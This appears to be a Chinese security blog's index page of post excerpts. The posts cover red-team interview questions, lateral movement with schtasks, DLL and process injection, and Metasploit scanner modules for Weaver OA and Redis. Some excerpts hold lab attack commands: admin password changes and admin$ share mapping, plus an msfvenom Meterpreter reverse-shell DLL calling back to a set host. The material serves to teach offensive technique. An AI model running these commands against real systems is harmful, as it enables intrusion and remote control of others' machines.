应届生的面试题（五）

长亭hw红队面试1.不出网有什么方法，正向shel l 方法除了reg之类的，还有什么？ 2.域内委派 3.dpapi机制说下，能干嘛 4.fastjson 不出网 5.shiro漏洞类型，721原理，721利用要注意什么？ 7.weblogic 漏洞类型都有啥,原理 8.dll劫持，dll注入 9.内网优先爆破测试的端口、为什么；如果只有3389开放，爆破3389的实际影响… 10.windo

apt攻击技术学习指南

老年人的生活

最近换了一份工作。也跟三十岁左右的男性打了一些交道，感受到岁月的残酷。 高铁上看着坐在我右边的某人头发上的白发；我以为某大佬三十多了（35以上）其实他才29；micro8在每篇文章中都说要多喝水，因为喝水喝少了，得了肾结石。 我们马上就要老了。 工作步入了正轨。 我已经完成了18岁的我的诺言，要成为一个会拉小提琴的黑客。 已经过去好多年了。大半夜的忽然有些感慨。原来我也是给能给新人指点迷津的老师傅

横向移动：schtasks远程计划任务

视频教程：横向移动手法介绍 拓扑图 执行的命令1234567891011121314151617181920212223242526272829303132333435363738394041net user administrator 123456net user administrator qwe123!net use \\192.168.123.67\admin$ /user:"a

反射式dll注入的演示

Powershell反射式dll注入 dll注入和反射式dll注入的区别合法进程 恶意dll 从本地或者dll调用 【生成恶意载荷，并执行web服务托管dll】 省略 【目标机器载入内存，使用反射式dll注入直接载入内存不落盘】 1234567PowerShell -Exec BypassImport-Module C:\Users\whale\Desktop\Invoke-Reflecti

dll注入的演示

前景提要whale的DLLHijack本地提权教程 进程注入与迁移 本期内容dll注入的演示 1.exe 2.exe msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f dll -o whale.dll python -m SimpleHTTPServer 80 handler

进程注入与迁移

进程注入与迁移 进程和线程的区别https://segmentfault.com/a/1190000039297639 进程，线程（公司）（人）卖食品、饮料、医疗、交通、房地产公司进程里有多个线程，就像一个公司里有多个员工 直接反弹shell的缺点： 进程注入的目的 进程的权限控制Integrity Levelhttps://blog.csdn.net/vlily/article/detai

应届生的面试题（四）

面试题1234567891011121314151617181920212223241、绕WAF2、反序列化 fastjson3、流量加密4、XXE5、命令执行 php&java的区别6、溯源7、中间件8、代码审计7、注入8、SSRF9、内网要怎么打1.证书透明2.Windows的Redis主从RCE3.PTH怎么利用和NTML验证端口是什么4.git和svn，svn5.CS怎么联

05-msf的泛微OA-rce扫描模块

写一个泛微OA的scanner扫描模块 这是python3的模块，使用方法是放到kali对应目录下：/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py 12345678910111213141516171819202122232425262728293031323

04-redis未授权扫描模块

需要的资料 msf开发文档 metasploit 脚本开发基础知识，ruby语法 Shodan搜索引擎介绍、以及如何在Linux命令行安装 redis未授权访问漏洞复现 课程结构 shodan被动信息搜集，寻找有redis服务的主机 metasploit改插件，判断是否存在redis漏洞 验证漏洞扫描结果 总结 录制的视频msf开发实践（一）redis未授权扫描模块 1234567891011